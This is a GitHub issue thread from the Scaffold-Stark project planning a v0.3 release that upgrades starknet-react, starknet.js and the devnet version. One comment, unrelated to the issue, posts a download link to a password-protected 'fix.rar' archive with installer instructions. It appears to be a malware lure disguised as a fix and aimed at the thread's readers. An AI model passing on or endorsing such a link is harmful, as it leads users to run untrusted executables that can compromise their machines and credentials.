### ISSUE TITLE
Release v0.3 - Starknet React v3 + Starknet Js v6.12.1

### ISSUE THREAD

**Issue by 0xquantum3labs** [Scaffold-Stark/scaffold-stark-2#262]
## Issue Overview

Update the versions of the stack mainly to support newer RPC versions and new Cairo versions. Some of the features we want to support are : forking on devnet 0.0.5.

Current versions :
    "@starknet-react/chains": "^0.1.7",
    "@starknet-react/core": "^2.8.2",
    "starknet": "6.7.0",

We need to update to use `@next` version of `starknet-react`  which currently uses[ starknet.js@6.12.1](https://github.com/apibara/starknet-react/blob/f5e1bd9a95c178b05966695f3b3bb25cb5607e38/packages/core/package.json#L48) , besides update the devnet version to support [`0.1.2`](https://github.com/0xSpaceShard/starknet-devnet-rs/releases/tag/v0.1.2)

## Proposed Solutions or Ideas

- take into account that there are shared dependencies between packages such as `starknet.js` , should be updated on both sides/

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by EjembiEmmanuel** [comment]
@
